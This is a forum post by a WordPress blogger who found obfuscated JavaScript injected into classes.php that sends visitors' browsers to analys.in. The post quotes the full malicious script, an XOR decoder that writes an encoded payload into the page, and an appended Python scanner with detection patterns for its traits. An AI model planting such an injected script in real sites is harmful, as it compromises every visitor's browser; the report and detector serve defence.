Mysterious code added to classes.php
I found my browser running to analys.in every time a page on my blog loads. Upon further examination, analys.in has its nameservers set to pc-banking.cn. So I suspect this is some Chinese network collecting information. I have no clue how they managed to get to the files (I have a very strong password, and I couldn’t find anything in bash history which goes back a couple of months). I checked every installed plugin and couldn’t find any references to the code that was added.
The specific code that was added?
<script type="text/javascript">function rsec(ggqgbleb) { function qqwze(szxtge) { var vnus = 0; var dmawfmw = szxtge.length; var ioqlo = 0; while (ioqlo < dmawfmw) { vnus += (szxtge.charCodeAt(ioqlo))*dmawfmw%255; ioqlo++; } return vnus%255; } ggqgbleb=unescape(ggqgbleb); try {var rxgz=arguments.callee;} catch(dgnesfhr){alert(dgnesfhr);} imcza=(new String(rxgz)).replace(/[^@a-z0-9A-Z_.,-]/g, ''); gnzp=qqwze(imcza); vtxfolfz=""; var ogqvggy = 0; for(dxgcgll=0;dxgcgll<ggqgbleb.length;dxgcgll++) { vtxfolfz += String.fromCharCode(ggqgbleb.charCodeAt(dxgcgll)^gnzp^imcza.charCodeAt(dxgcgll)^dxgcgll%255^ogqvggy%255); ogqvggy++; if (ogqvggy > imcza.length) ogqvggy = 0; } document.write(vtxfolfz); }rsec("%9F%D9%CD%D4%D0%C1%CF%8B%C4%C4%C3%9B%80%CA%C0%D6%D7%93%8F%88%C2%DE%CA%CA%C8%DF%84%C2%DA%9B%C1%CB%C1%C2%90%D4%DF%8C%C3%D4%CD%88%80%89%90%C5%81%CA%C8%D2%9C%8A%D2%DB%D0%C1%D0%DF%D3%D4%C5%DB%9A%CB%C1%C9%CF%C6%D4%C3%88%84%D3%C5%D9%C4%C5%CB%8C%88%8D%C2%C6%CE%C9%88%94%DE%C3%C5%DC%CC%8F%81%98%90%93%C3%D5%DF%D1%D7%C9%8C%80%90%C9%98%91%8B%DE%E0%D8%C0%CD%E1%8F%8C%8A");</script>
Plugins I have installed:
1 Blog Cacher, Add To Any, Adsense-Deluxe, All in One SEO Pack, del.icio.us - Bookmark This, Google XML Sitemaps, PHP Speedy WP, Spam Karma 2, Textile 2 (Improved), WordPress Database Backup, WP-ContactForm, WP-DBManager
I am stumped. Is this part of the same Chinese botnet news from a few days back??
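A check for the traits visible in the snippet quoted in the post above, as an added example that is not part of the original post or of any WordPress tooling: it flags files that combine several of `arguments.callee`, `unescape(`, an XOR inside `fromCharCode`, `document.write(` and a long run of `%XX` escapes. The indicator names, the threshold of three, the file extensions and both sample strings are assumptions constructed for illustration.

```python
import os
import re

# Traits taken from the injected <script> quoted in the post.
INDICATORS = {
    "self_reference": re.compile(r"arguments\.callee"),
    "unescape_call": re.compile(r"\bunescape\s*\("),
    "xor_char_decode": re.compile(r"fromCharCode\s*\([^;]{0,200}\^"),
    "document_write": re.compile(r"document\.write\s*\("),
    "long_percent_blob": re.compile(r"(?:%[0-9A-Fa-f]{2}){40,}"),
}
THRESHOLD = 3  # assumption: one or two traits alone are common in benign code
EXTENSIONS = (".php", ".js", ".html", ".htm")

SAMPLE_INJECTED = (  # constructed, shortened imitation of the posted snippet
    '<script>function f(s){s=unescape(s);var k=arguments.callee;var o="";'
    'for(i=0;i<s.length;i++){o+=String.fromCharCode(s.charCodeAt(i)^7);}'
    'document.write(o);}f("' + "%41" * 60 + '");</script>'
)
SAMPLE_CLEAN = "<?php echo \"<script>document.write(unescape('%41'));</script>\"; ?>"


def indicators_in(text):
    """Return the sorted names of the indicators that match text."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(text))


def is_suspicious(text):
    """True when at least THRESHOLD distinct traits appear together."""
    return len(indicators_in(text)) >= THRESHOLD


def scan_tree(root):
    """Walk root and return {path: [indicator names]} for suspicious files."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(EXTENSIONS):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    found = indicators_in(fh.read())
            except OSError:
                continue  # unreadable file: skip rather than abort the scan
            if len(found) >= THRESHOLD:
                hits[path] = found
    return hits
```

Pointing `scan_tree()` at the blog's document root lists every file carrying the same combination, which shows whether `classes.php` was the only file modified.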